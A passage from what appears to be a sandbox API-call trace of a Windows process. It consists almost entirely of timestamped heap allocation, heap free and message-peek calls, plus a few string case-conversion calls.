dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0267.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0267.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.447] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e50 [0267.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0267.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0267.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0267.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0267.448] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0267.448] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0267.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0267.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.449] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0267.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0267.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0267.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e50 [0267.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e50 [0267.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0267.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.450] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0267.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0267.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0267.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0267.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0267.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0267.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0267.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0267.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0267.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0267.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0267.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0267.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0267.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.453] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e50 [0267.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0267.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0267.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0267.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0267.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0267.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0267.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0267.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0267.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0267.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0267.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.455] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0267.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0267.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.456] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0267.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa460 [0267.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.457] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0267.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.457] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0267.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.458] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0267.458] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0267.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0267.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0267.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0267.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.466] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 